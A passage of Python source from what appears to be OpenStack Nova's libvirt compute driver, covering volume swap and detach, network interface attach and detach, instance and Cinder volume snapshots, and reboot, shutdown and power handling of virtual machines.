# domains, so we need to temporarily undefine it.
# If any part of this block fails, the domain is
# re-defined regardless.
if domain.isPersistent():
domain.undefine()
# Start copy with VIR_DOMAIN_REBASE_REUSE_EXT flag to
# allow writing to existing external volume file
domain.blockRebase(disk_path, new_path, 0,
libvirt.VIR_DOMAIN_BLOCK_REBASE_COPY |
libvirt.VIR_DOMAIN_BLOCK_REBASE_REUSE_EXT)
while self._wait_for_block_job(domain, disk_path):
time.sleep(0.5)
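# The copy has reached a mirrored state: pivot the domain onto the new
# path and end the block job.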
domain.blockJobAbort(disk_path,
libvirt.VIR_DOMAIN_BLOCK_JOB_ABORT_PIVOT)
if resize_to:
# NOTE(alex_xu): domain.blockJobAbort isn't a synchronous call;
# this is a bug in libvirt, so we need to wait until the pivot
# has finished. See libvirt bug #1119173.
while self._wait_for_block_job(domain, disk_path,
wait_for_job_clean=True):
time.sleep(0.5)
domain.blockResize(disk_path, resize_to * units.Gi / units.Ki)
finally:
self._conn.defineXML(xml)
def swap_volume(self, old_connection_info,
new_connection_info, instance, mountpoint, resize_to):
instance_name = instance['name']
virt_dom = self._lookup_by_name(instance_name)
disk_dev = mountpoint.rpartition("/")[2]
xml = self._get_disk_xml(virt_dom.XMLDesc(0), disk_dev)
if not xml:
raise exception.DiskNotFound(location=disk_dev)
disk_info = {
'dev': disk_dev,
'bus': blockinfo.get_disk_bus_for_disk_dev(
CONF.libvirt.virt_type, disk_dev),
'type': 'disk',
}
conf = self._connect_volume(new_connection_info, disk_info)
if not conf.source_path:
self._disconnect_volume(new_connection_info, disk_dev)
raise NotImplementedError(_("Swap only supports host devices"))
self._swap_volume(virt_dom, disk_dev, conf.source_path, resize_to)
self._disconnect_volume(old_connection_info, disk_dev)
@staticmethod
def _get_disk_xml(xml, device):
"""Returns the xml for the disk mounted at device."""
try:
doc = etree.fromstring(xml)
except Exception:
return None
ret = doc.findall('./devices/disk')
for node in ret:
for child in node.getchildren():
if child.tag == 'target':
if child.get('dev') == device:
return etree.tostring(node)
def _get_existing_domain_xml(self, instance, network_info,
block_device_info=None):
try:
virt_dom = self._lookup_by_name(instance['name'])
xml = virt_dom.XMLDesc(0)
except exception.InstanceNotFound:
disk_info = blockinfo.get_disk_info(CONF.libvirt.virt_type,
instance,
block_device_info)
xml = self._get_guest_xml(nova_context.get_admin_context(),
instance, network_info, disk_info,
block_device_info=block_device_info)
return xml
def detach_volume(self, connection_info, instance, mountpoint,
encryption=None):
instance_name = instance['name']
disk_dev = mountpoint.rpartition("/")[2]
try:
virt_dom = self._lookup_by_name(instance_name)
xml = self._get_disk_xml(virt_dom.XMLDesc(0), disk_dev)
if not xml:
raise exception.DiskNotFound(location=disk_dev)
else:
# NOTE(vish): We can always affect config because our
# domains are persistent, but we should only
# affect live if the domain is running.
flags = libvirt.VIR_DOMAIN_AFFECT_CONFIG
state = LIBVIRT_POWER_STATE[virt_dom.info()[0]]
if state in (power_state.RUNNING, power_state.PAUSED):
flags |= libvirt.VIR_DOMAIN_AFFECT_LIVE
virt_dom.detachDeviceFlags(xml, flags)
if encryption:
# The volume must be detached from the VM before
# disconnecting it from its encryptor. Otherwise, the
# encryptor may report that the volume is still in use.
encryptor = self._get_volume_encryptor(connection_info,
encryption)
encryptor.detach_volume(**encryption)
except exception.InstanceNotFound:
# NOTE(zhaoqin): If the instance does not exist, _lookup_by_name()
# will throw InstanceNotFound exception. Need to
# disconnect volume under this circumstance.
LOG.warn(_LW("During detach_volume, instance disappeared."))
except libvirt.libvirtError as ex:
# NOTE(vish): This is called to cleanup volumes after live
# migration, so we should still disconnect even if
# the instance doesn't exist here anymore.
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
LOG.warn(_LW("During detach_volume, instance disappeared."))
else:
raise
self._disconnect_volume(connection_info, disk_dev)
def attach_interface(self, instance, image_meta, vif):
virt_dom = self._lookup_by_name(instance['name'])
flavor = objects.Flavor.get_by_id(
nova_context.get_admin_context(read_deleted='yes'),
instance['instance_type_id'])
self.vif_driver.plug(instance, vif)
self.firewall_driver.setup_basic_filtering(instance, [vif])
cfg = self.vif_driver.get_config(instance, vif, image_meta,
flavor, CONF.libvirt.virt_type)
try:
flags = libvirt.VIR_DOMAIN_AFFECT_CONFIG
state = LIBVIRT_POWER_STATE[virt_dom.info()[0]]
if state == power_state.RUNNING or state == power_state.PAUSED:
flags |= libvirt.VIR_DOMAIN_AFFECT_LIVE
virt_dom.attachDeviceFlags(cfg.to_xml(), flags)
except libvirt.libvirtError:
LOG.error(_LE('attaching network adapter failed.'),
instance=instance)
self.vif_driver.unplug(instance, vif)
raise exception.InterfaceAttachFailed(
instance_uuid=instance['uuid'])
def detach_interface(self, instance, vif):
virt_dom = self._lookup_by_name(instance['name'])
flavor = objects.Flavor.get_by_id(
nova_context.get_admin_context(read_deleted='yes'),
instance['instance_type_id'])
cfg = self.vif_driver.get_config(instance, vif, None, flavor,
CONF.libvirt.virt_type)
try:
self.vif_driver.unplug(instance, vif)
flags = libvirt.VIR_DOMAIN_AFFECT_CONFIG
state = LIBVIRT_POWER_STATE[virt_dom.info()[0]]
if state == power_state.RUNNING or state == power_state.PAUSED:
flags |= libvirt.VIR_DOMAIN_AFFECT_LIVE
virt_dom.detachDeviceFlags(cfg.to_xml(), flags)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
LOG.warn(_LW("During detach_interface, "
"instance disappeared."),
instance=instance)
else:
LOG.error(_LE('detaching network adapter failed.'),
instance=instance)
raise exception.InterfaceDetachFailed(
instance_uuid=instance['uuid'])
def _create_snapshot_metadata(self, base, instance, img_fmt, snp_name):
metadata = {'is_public': False,
'status': 'active',
'name': snp_name,
'properties': {
'kernel_id': instance['kernel_id'],
'image_location': 'snapshot',
'image_state': 'available',
'owner_id': instance['project_id'],
'ramdisk_id': instance['ramdisk_id'],
}
}
if instance['os_type']:
metadata['properties']['os_type'] = instance['os_type']
# NOTE(vish): glance forces ami disk format to be ami
if base.get('disk_format') == 'ami':
metadata['disk_format'] = 'ami'
else:
metadata['disk_format'] = img_fmt
metadata['container_format'] = base.get('container_format', 'bare')
return metadata
def snapshot(self, context, instance, image_id, update_task_state):
"""Create snapshot from a running VM instance.
This command only works with qemu 0.14+
"""
try:
virt_dom = self._lookup_by_name(instance['name'])
except exception.InstanceNotFound:
raise exception.InstanceNotRunning(instance_id=instance['uuid'])
base_image_ref = instance['image_ref']
base = compute_utils.get_image_metadata(
context, self._image_api, base_image_ref, instance)
snapshot = self._image_api.get(context, image_id)
disk_path = libvirt_utils.find_disk(virt_dom)
source_format = libvirt_utils.get_disk_type(disk_path)
image_format = CONF.libvirt.snapshot_image_format or source_format
# NOTE(bfilippov): save lvm and rbd as raw
if image_format == 'lvm' or image_format == 'rbd':
image_format = 'raw'
metadata = self._create_snapshot_metadata(base,
instance,
image_format,
snapshot['name'])
snapshot_name = uuid.uuid4().hex
state = LIBVIRT_POWER_STATE[virt_dom.info()[0]]
# NOTE(rmk): Live snapshots require QEMU 1.3 and Libvirt 1.0.0.
# These restrictions can be relaxed as other configurations
# can be validated.
if self._has_min_version(MIN_LIBVIRT_LIVESNAPSHOT_VERSION,
MIN_QEMU_LIVESNAPSHOT_VERSION,
REQ_HYPERVISOR_LIVESNAPSHOT) \
and not source_format == "lvm" and not source_format == 'rbd':
live_snapshot = True
# Abort is an idempotent operation, so make sure any block
# jobs which may have failed are ended. This operation also
# confirms the running instance, as opposed to the system as a
# whole, has a new enough version of the hypervisor (bug 1193146).
try:
virt_dom.blockJobAbort(disk_path, 0)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_CONFIG_UNSUPPORTED:
live_snapshot = False
else:
pass
else:
live_snapshot = False
# NOTE(rmk): We cannot perform live snapshots when a managedSave
# file is present, so we will use the cold/legacy method
# for instances which are shutdown.
if state == power_state.SHUTDOWN:
live_snapshot = False
# NOTE(dkang): managedSave does not work for LXC
if CONF.libvirt.virt_type != 'lxc' and not live_snapshot:
if state == power_state.RUNNING or state == power_state.PAUSED:
self._detach_pci_devices(virt_dom,
pci_manager.get_instance_pci_devs(instance))
virt_dom.managedSave(0)
snapshot_backend = self.image_backend.snapshot(disk_path,
image_type=source_format)
if live_snapshot:
LOG.info(_LI("Beginning live snapshot process"),
instance=instance)
else:
LOG.info(_LI("Beginning cold snapshot process"),
instance=instance)
update_task_state(task_state=task_states.IMAGE_PENDING_UPLOAD)
snapshot_directory = CONF.libvirt.snapshots_directory
fileutils.ensure_tree(snapshot_directory)
with utils.tempdir(dir=snapshot_directory) as tmpdir:
try:
out_path = os.path.join(tmpdir, snapshot_name)
if live_snapshot:
# NOTE(xqueralt): libvirt needs o+x in the temp directory
os.chmod(tmpdir, 0o701)
self._live_snapshot(virt_dom, disk_path, out_path,
image_format)
else:
snapshot_backend.snapshot_extract(out_path, image_format)
finally:
new_dom = None
# NOTE(dkang): because previous managedSave is not called
# for LXC, _create_domain must not be called.
if CONF.libvirt.virt_type != 'lxc' and not live_snapshot:
if state == power_state.RUNNING:
new_dom = self._create_domain(domain=virt_dom)
elif state == power_state.PAUSED:
new_dom = self._create_domain(domain=virt_dom,
launch_flags=libvirt.VIR_DOMAIN_START_PAUSED)
if new_dom is not None:
self._attach_pci_devices(new_dom,
pci_manager.get_instance_pci_devs(instance))
LOG.info(_LI("Snapshot extracted, beginning image upload"),
instance=instance)
# Upload that image to the image service
update_task_state(task_state=task_states.IMAGE_UPLOADING,
expected_state=task_states.IMAGE_PENDING_UPLOAD)
with libvirt_utils.file_open(out_path) as image_file:
self._image_api.update(context,
image_id,
metadata,
image_file)
LOG.info(_LI("Snapshot image upload complete"),
instance=instance)
@staticmethod
def _wait_for_block_job(domain, disk_path, abort_on_error=False,
wait_for_job_clean=False):
"""Wait for libvirt block job to complete.
Libvirt may return either cur==end or an empty dict when
the job is complete, depending on whether libvirt has already
cleaned the job up.
:returns: True if still in progress
False if completed
"""
status = domain.blockJobInfo(disk_path, 0)
if status == -1 and abort_on_error:
msg = _('libvirt error while requesting blockjob info.')
raise exception.NovaException(msg)
try:
cur = status.get('cur', 0)
end = status.get('end', 0)
except Exception:
return False
if wait_for_job_clean:
job_ended = not status
else:
job_ended = cur == end
return not job_ended
def _live_snapshot(self, domain, disk_path, out_path, image_format):
"""Snapshot an instance without downtime."""
# Save a copy of the domain's persistent XML file
xml = domain.XMLDesc(
libvirt.VIR_DOMAIN_XML_INACTIVE |
libvirt.VIR_DOMAIN_XML_SECURE)
# Abort is an idempotent operation, so make sure any block
# jobs which may have failed are ended.
try:
domain.blockJobAbort(disk_path, 0)
except Exception:
pass
# NOTE (rmk): We are using shallow rebases as a workaround to a bug
# in QEMU 1.3. In order to do this, we need to create
# a destination image with the original backing file
# and matching size of the instance root disk.
src_disk_size = libvirt_utils.get_disk_size(disk_path)
src_back_path = libvirt_utils.get_disk_backing_file(disk_path,
basename=False)
disk_delta = out_path + '.delta'
libvirt_utils.create_cow_image(src_back_path, disk_delta,
src_disk_size)
try:
# NOTE (rmk): blockRebase cannot be executed on persistent
# domains, so we need to temporarily undefine it.
# If any part of this block fails, the domain is
# re-defined regardless.
if domain.isPersistent():
domain.undefine()
# NOTE (rmk): Establish a temporary mirror of our root disk and
# issue an abort once we have a complete copy.
domain.blockRebase(disk_path, disk_delta, 0,
libvirt.VIR_DOMAIN_BLOCK_REBASE_COPY |
libvirt.VIR_DOMAIN_BLOCK_REBASE_REUSE_EXT |
libvirt.VIR_DOMAIN_BLOCK_REBASE_SHALLOW)
while self._wait_for_block_job(domain, disk_path):
time.sleep(0.5)
domain.blockJobAbort(disk_path, 0)
libvirt_utils.chown(disk_delta, os.getuid())
finally:
self._conn.defineXML(xml)
# Convert the delta (CoW) image with a backing file to a flat
# image with no backing file.
libvirt_utils.extract_snapshot(disk_delta, 'qcow2',
out_path, image_format)
def _volume_snapshot_update_status(self, context, snapshot_id, status):
"""Send a snapshot status update to Cinder.
This method captures and logs exceptions that occur
since callers cannot do anything useful with these exceptions.
Operations on the Cinder side waiting for this will time out if
a failure occurs sending the update.
:param context: security context
:param snapshot_id: id of snapshot being updated
:param status: new status value
"""
try:
self._volume_api.update_snapshot_status(context,
snapshot_id,
status)
except Exception:
LOG.exception(_LE('Failed to send updated snapshot status '
'to volume service.'))
def _volume_snapshot_create(self, context, instance, domain,
volume_id, snapshot_id, new_file):
"""Perform volume snapshot.
:param domain: VM that volume is attached to
:param volume_id: volume UUID to snapshot
:param snapshot_id: UUID of snapshot being created
:param new_file: relative path to new qcow2 file present on share
"""
xml = domain.XMLDesc(0)
xml_doc = etree.fromstring(xml)
device_info = vconfig.LibvirtConfigGuest()
device_info.parse_dom(xml_doc)
disks_to_snap = [] # to be snapshotted by libvirt
network_disks_to_snap = [] # network disks (netfs, gluster, etc.)
disks_to_skip = [] # local disks not snapshotted
for guest_disk in device_info.devices:
if (guest_disk.root_name != 'disk'):
continue
if (guest_disk.target_dev is None):
continue
if (guest_disk.serial is None or guest_disk.serial != volume_id):
disks_to_skip.append(guest_disk.target_dev)
continue
# disk is a Cinder volume with the correct volume_id
disk_info = {
'dev': guest_disk.target_dev,
'serial': guest_disk.serial,
'current_file': guest_disk.source_path,
'source_protocol': guest_disk.source_protocol,
'source_name': guest_disk.source_name,
'source_hosts': guest_disk.source_hosts,
'source_ports': guest_disk.source_ports
}
# Determine path for new_file based on current path
if disk_info['current_file'] is not None:
current_file = disk_info['current_file']
new_file_path = os.path.join(os.path.dirname(current_file),
new_file)
disks_to_snap.append((current_file, new_file_path))
elif disk_info['source_protocol'] in ('gluster', 'netfs'):
network_disks_to_snap.append((disk_info, new_file))
if not disks_to_snap and not network_disks_to_snap:
msg = _('Found no disk to snapshot.')
raise exception.NovaException(msg)
snapshot = vconfig.LibvirtConfigGuestSnapshot()
for current_name, new_filename in disks_to_snap:
snap_disk = vconfig.LibvirtConfigGuestSnapshotDisk()
snap_disk.name = current_name
snap_disk.source_path = new_filename
snap_disk.source_type = 'file'
snap_disk.snapshot = 'external'
snap_disk.driver_name = 'qcow2'
snapshot.add_disk(snap_disk)
for disk_info, new_filename in network_disks_to_snap:
snap_disk = vconfig.LibvirtConfigGuestSnapshotDisk()
snap_disk.name = disk_info['dev']
snap_disk.source_type = 'network'
snap_disk.source_protocol = disk_info['source_protocol']
snap_disk.snapshot = 'external'
snap_disk.source_path = new_filename
old_dir = disk_info['source_name'].split('/')[0]
snap_disk.source_name = '%s/%s' % (old_dir, new_filename)
snap_disk.source_hosts = disk_info['source_hosts']
snap_disk.source_ports = disk_info['source_ports']
snapshot.add_disk(snap_disk)
for dev in disks_to_skip:
snap_disk = vconfig.LibvirtConfigGuestSnapshotDisk()
snap_disk.name = dev
snap_disk.snapshot = 'no'
snapshot.add_disk(snap_disk)
snapshot_xml = snapshot.to_xml()
LOG.debug("snap xml: %s", snapshot_xml)
snap_flags = (libvirt.VIR_DOMAIN_SNAPSHOT_CREATE_DISK_ONLY |
libvirt.VIR_DOMAIN_SNAPSHOT_CREATE_NO_METADATA |
libvirt.VIR_DOMAIN_SNAPSHOT_CREATE_REUSE_EXT)
QUIESCE = libvirt.VIR_DOMAIN_SNAPSHOT_CREATE_QUIESCE
try:
domain.snapshotCreateXML(snapshot_xml,
snap_flags | QUIESCE)
return
except libvirt.libvirtError:
LOG.exception(_LE('Unable to create quiesced VM snapshot, '
'attempting again with quiescing disabled.'))
try:
domain.snapshotCreateXML(snapshot_xml, snap_flags)
except libvirt.libvirtError:
LOG.exception(_LE('Unable to create VM snapshot, '
'failing volume_snapshot operation.'))
raise
def _volume_refresh_connection_info(self, context, instance, volume_id):
bdm = objects.BlockDeviceMapping.get_by_volume_id(context,
volume_id)
driver_bdm = driver_block_device.DriverVolumeBlockDevice(bdm)
driver_bdm.refresh_connection_info(context, instance,
self._volume_api, self)
def volume_snapshot_create(self, context, instance, volume_id,
create_info):
"""Create snapshots of a Cinder volume via libvirt.
:param instance: VM instance object reference
:param volume_id: id of volume being snapshotted
:param create_info: dict of information used to create snapshots
- snapshot_id : ID of snapshot
- type : qcow2 / <other>
- new_file : qcow2 file created by Cinder which
becomes the VM's active image after
the snapshot is complete
"""
LOG.debug("volume_snapshot_create: create_info: %(c_info)s",
{'c_info': create_info}, instance=instance)
try:
virt_dom = self._lookup_by_name(instance.name)
except exception.InstanceNotFound:
raise exception.InstanceNotRunning(instance_id=instance.uuid)
if create_info['type'] != 'qcow2':
raise exception.NovaException(_('Unknown type: %s') %
create_info['type'])
snapshot_id = create_info.get('snapshot_id', None)
if snapshot_id is None:
raise exception.NovaException(_('snapshot_id required '
'in create_info'))
try:
self._volume_snapshot_create(context, instance, virt_dom,
volume_id, snapshot_id,
create_info['new_file'])
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_LE('Error occurred during '
'volume_snapshot_create, '
'sending error status to Cinder.'))
self._volume_snapshot_update_status(
context, snapshot_id, 'error')
self._volume_snapshot_update_status(
context, snapshot_id, 'creating')
def _wait_for_snapshot():
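# Poll Cinder until the snapshot leaves the 'creating' state, then
# refresh the block device mapping's connection info.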
snapshot = self._volume_api.get_snapshot(context, snapshot_id)
if snapshot.get('status') != 'creating':
self._volume_refresh_connection_info(context, instance,
volume_id)
raise loopingcall.LoopingCallDone()
timer = loopingcall.FixedIntervalLoopingCall(_wait_for_snapshot)
timer.start(interval=0.5).wait()
def _volume_snapshot_delete(self, context, instance, volume_id,
snapshot_id, delete_info=None):
"""Note:
if file being merged into == active image:
do a blockRebase (pull) operation
else:
do a blockCommit operation
Files must be adjacent in snap chain.
:param instance: instance object reference
:param volume_id: volume UUID
:param snapshot_id: snapshot UUID (unused currently)
:param delete_info: {
'type': 'qcow2',
'file_to_merge': 'a.img',
'merge_target_file': 'b.img' or None (if merging file_to_merge into
active image)
}
Libvirt blockjob handling required for this method is broken
in versions of libvirt that do not contain:
http://libvirt.org/git/?p=libvirt.git;h=0f9e67bfad (1.1.1)
(Patch is pending in 1.0.5-maint branch as well, but we cannot detect
libvirt 1.0.5.5 vs. 1.0.5.6 here.)
"""
if not self._has_min_version(MIN_LIBVIRT_BLOCKJOBINFO_VERSION):
ver = '.'.join([str(x) for x in MIN_LIBVIRT_BLOCKJOBINFO_VERSION])
msg = _("Libvirt '%s' or later is required for online deletion "
"of volume snapshots.") % ver
raise exception.Invalid(msg)
LOG.debug('volume_snapshot_delete: delete_info: %s', delete_info)
if delete_info['type'] != 'qcow2':
msg = _('Unknown delete_info type %s') % delete_info['type']
raise exception.NovaException(msg)
try:
virt_dom = self._lookup_by_name(instance.name)
except exception.InstanceNotFound:
raise exception.InstanceNotRunning(instance_id=instance.uuid)
# Find dev name
my_dev = None
active_disk = None
xml = virt_dom.XMLDesc(0)
xml_doc = etree.fromstring(xml)
device_info = vconfig.LibvirtConfigGuest()
device_info.parse_dom(xml_doc)
active_disk_object = None
for guest_disk in device_info.devices:
if (guest_disk.root_name != 'disk'):
continue
if (guest_disk.target_dev is None or guest_disk.serial is None):
continue
if guest_disk.serial == volume_id:
my_dev = guest_disk.target_dev
active_disk = guest_disk.source_path
active_protocol = guest_disk.source_protocol
active_disk_object = guest_disk
break
if my_dev is None or (active_disk is None and active_protocol is None):
msg = _('Disk with id: %s '
'not found attached to instance.') % volume_id
LOG.debug('Domain XML: %s', xml)
raise exception.NovaException(msg)
LOG.debug("found device at %s", my_dev)
def _get_snap_dev(filename, backing_store):
if filename is None:
msg = _('filename cannot be None')
raise exception.NovaException(msg)
# libgfapi delete
LOG.debug("XML: %s" % xml)
LOG.debug("active disk object: %s" % active_disk_object)
# determine reference within backing store for desired image
filename_to_merge = filename
matched_name = None
b = backing_store
index = None
current_filename = active_disk_object.source_name.split('/')[1]
if current_filename == filename_to_merge:
return my_dev + '[0]'
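# Otherwise walk the backing chain until the requested file is found and
# address it by its chain index, e.g. "vda[1]".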
while b is not None:
source_filename = b.source_name.split('/')[1]
if source_filename == filename_to_merge:
LOG.debug('found match: %s', b.source_name)
matched_name = b.source_name
index = b.index
break
b = b.backing_store
if matched_name is None:
msg = _('no match found for %s') % (filename_to_merge)
raise exception.NovaException(msg)
LOG.debug('index of match (%s) is %s', b.source_name, index)
my_snap_dev = '%s[%s]' % (my_dev, index)
return my_snap_dev
if delete_info['merge_target_file'] is None:
# pull via blockRebase()
# Merge the most recent snapshot into the active image
rebase_disk = my_dev
rebase_flags = 0
rebase_base = delete_info['file_to_merge'] # often None
if active_protocol is not None:
rebase_base = _get_snap_dev(delete_info['file_to_merge'],
active_disk_object.backing_store)
rebase_bw = 0
LOG.debug('disk: %(disk)s, base: %(base)s, '
'bw: %(bw)s, flags: %(flags)s',
{'disk': rebase_disk,
'base': rebase_base,
'bw': rebase_bw,
'flags': rebase_flags})
result = virt_dom.blockRebase(rebase_disk, rebase_base,
rebase_bw, rebase_flags)
if result == 0:
LOG.debug('blockRebase started successfully')
while self._wait_for_block_job(virt_dom, my_dev,
abort_on_error=True):
LOG.debug('waiting for blockRebase job completion')
time.sleep(0.5)
else:
# commit with blockCommit()
my_snap_base = None
my_snap_top = None
commit_disk = my_dev
commit_flags = 0
if active_protocol is not None:
my_snap_base = _get_snap_dev(delete_info['merge_target_file'],
active_disk_object.backing_store)
my_snap_top = _get_snap_dev(delete_info['file_to_merge'],
active_disk_object.backing_store)
try:
commit_flags |= libvirt.VIR_DOMAIN_BLOCK_COMMIT_RELATIVE
except AttributeError:
ver = '.'.join(
[str(x) for x in
MIN_LIBVIRT_BLOCKCOMMIT_RELATIVE_VERSION])
msg = _("Relative blockcommit support was not detected. "
"Libvirt '%s' or later is required for online "
"deletion of network storage-backed volume "
"snapshots.") % ver
raise exception.Invalid(msg)
commit_base = my_snap_base or delete_info['merge_target_file']
commit_top = my_snap_top or delete_info['file_to_merge']
bandwidth = 0
LOG.debug('will call blockCommit with commit_disk=%(commit_disk)s '
'commit_base=%(commit_base)s '
'commit_top=%(commit_top)s '
% {'commit_disk': commit_disk,
'commit_base': commit_base,
'commit_top': commit_top})
result = virt_dom.blockCommit(commit_disk, commit_base, commit_top,
bandwidth, commit_flags)
if result == 0:
LOG.debug('blockCommit started successfully')
while self._wait_for_block_job(virt_dom, my_dev,
abort_on_error=True):
LOG.debug('waiting for blockCommit job completion')
time.sleep(0.5)
def volume_snapshot_delete(self, context, instance, volume_id, snapshot_id,
delete_info):
try:
self._volume_snapshot_delete(context, instance, volume_id,
snapshot_id, delete_info=delete_info)
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_LE('Error occurred during '
'volume_snapshot_delete, '
'sending error status to Cinder.'))
self._volume_snapshot_update_status(
context, snapshot_id, 'error_deleting')
self._volume_snapshot_update_status(context, snapshot_id, 'deleting')
self._volume_refresh_connection_info(context, instance, volume_id)
def reboot(self, context, instance, network_info, reboot_type,
block_device_info=None, bad_volumes_callback=None):
"""Reboot a virtual machine, given an instance reference."""
if reboot_type == 'SOFT':
# NOTE(vish): This will attempt to do a graceful shutdown/restart.
try:
soft_reboot_success = self._soft_reboot(instance)
except libvirt.libvirtError as e:
LOG.debug("Instance soft reboot failed: %s", e)
soft_reboot_success = False
if soft_reboot_success:
LOG.info(_LI("Instance soft rebooted successfully."),
instance=instance)
return
else:
LOG.warn(_LW("Failed to soft reboot instance. "
"Trying hard reboot."),
instance=instance)
return self._hard_reboot(context, instance, network_info,
block_device_info)
def _soft_reboot(self, instance):
"""Attempt to shutdown and restart the instance gracefully.
We use shutdown and create here so we can return if the guest
responded and actually rebooted. Note that this method only
succeeds if the guest responds to acpi. Therefore we return
success or failure so we can fall back to a hard reboot if
necessary.
:returns: True if the reboot succeeded
"""
dom = self._lookup_by_name(instance["name"])
state = LIBVIRT_POWER_STATE[dom.info()[0]]
old_domid = dom.ID()
# NOTE(vish): This check allows us to reboot an instance that
# is already shutdown.
if state == power_state.RUNNING:
dom.shutdown()
# NOTE(vish): This actually could take slightly longer than the
# FLAG defines depending on how long the get_info
# call takes to return.
self._prepare_pci_devices_for_use(
pci_manager.get_instance_pci_devs(instance))
for x in xrange(CONF.libvirt.wait_soft_reboot_seconds):
dom = self._lookup_by_name(instance["name"])
state = LIBVIRT_POWER_STATE[dom.info()[0]]
new_domid = dom.ID()
# NOTE(ivoks): By checking domain IDs, we make sure we are
# not recreating a domain that's already running.
if old_domid != new_domid:
if state in [power_state.SHUTDOWN,
power_state.CRASHED]:
LOG.info(_LI("Instance shutdown successfully."),
instance=instance)
self._create_domain(domain=dom)
timer = loopingcall.FixedIntervalLoopingCall(
self._wait_for_running, instance)
timer.start(interval=0.5).wait()
return True
else:
LOG.info(_LI("Instance may have been rebooted during soft "
"reboot, so return now."), instance=instance)
return True
greenthread.sleep(1)
return False
def _hard_reboot(self, context, instance, network_info,
block_device_info=None):
"""Reboot a virtual machine, given an instance reference.
Performs a Libvirt reset (if supported) on the domain.
If Libvirt reset is unavailable this method actually destroys and
re-creates the domain to ensure the reboot happens, as the guest
OS cannot ignore this action.
The guest XML is regenerated from the current instance state rather
than reused from the existing domain.
"""
self._destroy(instance)
# Get the system metadata from the instance
system_meta = utils.instance_sys_meta(instance)
# Convert the system metadata to image metadata
image_meta = utils.get_image_from_system_metadata(system_meta)
if not image_meta:
image_ref = instance.get('image_ref')
image_meta = compute_utils.get_image_metadata(context,
self._image_api,
image_ref,
instance)
disk_info = blockinfo.get_disk_info(CONF.libvirt.virt_type,
instance,
block_device_info,
image_meta)
# NOTE(vish): This could generate the wrong device_format if we are
# using the raw backend and the images don't exist yet.
# The create_images_and_backing below doesn't properly
# regenerate raw backend images, however, so when it
# does we need to (re)generate the xml after the images
# are in place.
xml = self._get_guest_xml(context, instance, network_info, disk_info,
image_meta=image_meta,
block_device_info=block_device_info,
write_to_disk=True)
# NOTE (rmk): Re-populate any missing backing files.
disk_info_json = self._get_instance_disk_info(instance['name'], xml,
block_device_info)
instance_dir = libvirt_utils.get_instance_path(instance)
self._create_images_and_backing(context, instance, instance_dir,
disk_info_json)
# Initialize all the necessary networking, block devices and
# start the instance.
self._create_domain_and_network(context, xml, instance, network_info,
block_device_info, reboot=True,
vifs_already_plugged=True)
self._prepare_pci_devices_for_use(
pci_manager.get_instance_pci_devs(instance))
def _wait_for_reboot():
"""Called at an interval until the VM is running again."""
state = self.get_info(instance)['state']
if state == power_state.RUNNING:
LOG.info(_LI("Instance rebooted successfully."),
instance=instance)
raise loopingcall.LoopingCallDone()
timer = loopingcall.FixedIntervalLoopingCall(_wait_for_reboot)
timer.start(interval=0.5).wait()
def pause(self, instance):
"""Pause VM instance."""
dom = self._lookup_by_name(instance['name'])
dom.suspend()
def unpause(self, instance):
"""Unpause paused VM instance."""
dom = self._lookup_by_name(instance['name'])
dom.resume()
def _clean_shutdown(self, instance, timeout, retry_interval):
"""Attempt to shutdown the instance gracefully.
:param instance: The instance to be shutdown
:param timeout: How long to wait in seconds for the instance to
shutdown
:param retry_interval: How often in seconds to signal the instance
to shutdown while waiting
:returns: True if the shutdown succeeded
"""
# List of states that represent a shutdown instance
SHUTDOWN_STATES = [power_state.SHUTDOWN,
power_state.CRASHED]
try:
dom = self._lookup_by_name(instance["name"])
except exception.InstanceNotFound:
# If the instance has gone then we don't need to
# wait for it to shutdown
return True
(state, _max_mem, _mem, _cpus, _t) = dom.info()
state = LIBVIRT_POWER_STATE[state]
if state in SHUTDOWN_STATES:
LOG.info(_LI("Instance already shutdown."),
instance=instance)
return True
LOG.debug("Shutting down instance from state %s", state,
instance=instance)
dom.shutdown()
retry_countdown = retry_interval
for sec in six.moves.range(timeout):
dom = self._lookup_by_name(instance["name"])
(state, _max_mem, _mem, _cpus, _t) = dom.info()
state = LIBVIRT_POWER_STATE[state]
if state in SHUTDOWN_STATES:
LOG.info(_LI("Instance shutdown successfully after %d "
"seconds."), sec, instance=instance)
return True
            # Note(PhilD): We can't assume that the Guest was able to process
            #              any previous shutdown signal (for example it may
            #              have still been starting up), so within the overall
            #              timeout we re-trigger the shutdown every
            #              retry_interval.
if retry_countdown == 0:
retry_countdown = retry_interval
# Instance could shutdown at any time, in which case we
# will get an exception when we call shutdown
try:
LOG.debug("Instance in state %s after %d seconds - "
"resending shutdown", state, sec,
instance=instance)
dom.shutdown()
except libvirt.libvirtError:
                    # Assume this is because it's now shut down, so loop
                    # one more time to clean up.
LOG.debug("Ignoring libvirt exception from shutdown "
"request.", instance=instance)
continue
else:
retry_countdown -= 1
time.sleep(1)
LOG.info(_LI("Instance failed to shutdown in %d seconds."),
timeout, instance=instance)
return False
def power_off(self, instance, timeout=0, retry_interval=0):
"""Power off the specified instance."""
if timeout:
self._clean_shutdown(instance, timeout, retry_interval)
self._destroy(instance)
def power_on(self, context, instance, network_info,
block_device_info=None):
"""Power on the specified instance."""
# We use _hard_reboot here to ensure that all backing files,
# network, and block device connections, etc. are established
# and available before we attempt to start the instance.
self._hard_reboot(context, instance, network_info, block_device_info)
def suspend(self, instance):
"""Suspend the specified instance."""
dom = self._lookup_by_name(instance['name'])
self._detach_pci_devices(dom,
pci_manager.get_instance_pci_devs(instance))
dom.managedSave(0)
def resume(self, context, instance, network_info, block_device_info=None):
"""resume the specified instance."""
xml = self._get_existing_domain_xml(instance, network_info,
block_device_info)
dom = self._create_domain_and_network(context, xml, instance,
network_info, block_device_info=block_device_info,
vifs_already_plugged=True)
self._attach_pci_devices(dom,
pci_manager.get_instance_pci_devs(instance))
def resume_state_on_host_boot(self, context, instance, network_info,
block_device_info=None):
"""resume guest state when a host is booted."""
# Check if the instance is running already and avoid doing
# anything if it is.
try:
domain = self._lookup_by_name(instance['name'])
state = LIBVIRT_POWER_STATE[domain.info()[0]]
ignored_states = (power_state.RUNNING,
power_state.SUSPENDED,
power_state.NOSTATE,
